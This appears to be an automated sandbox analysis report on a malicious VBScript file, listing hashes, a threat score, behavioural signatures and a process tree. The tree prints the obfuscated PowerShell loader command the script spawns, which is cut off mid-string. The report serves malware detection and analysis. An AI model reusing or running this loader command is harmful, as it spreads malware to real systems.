Analysis

  • max time kernel
    118s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20231023-en
  • resource tags

    arch:x64, arch:x86, image:win7-20231023-en, locale:en-us, os:windows7-x64, system
  • submitted
    07/12/2023, 12:48

General

  • Target

    envifa.vbs

  • Size

    154KB

  • MD5

    18bb62e29138d9c8dd098e5be9a4c13c

  • SHA1

    5362535f49fee8fd7333be8fc6ea249deffa2eb9

  • SHA256

    e0ad36136960203db1aea53780b49ef2c819ad31d68980822c4dff0d8dab1a14

  • SHA512

    0a0e37dab52b3892a9148e40f12408256c8d8eb6dede9217bb47cda010ae672775bd88535b0ab94c6800b3e22ab7c53ae6e9fe8dcd790e9849cfb749fa5b77b8

  • SSDEEP

    384:5UDkE9rQyhN65y//88tyLYtymNDycT+zjgyX4uynPivlytR/dJPfyFfhywzqggCq:j2Nek58Rc

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\envifa.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2104
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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
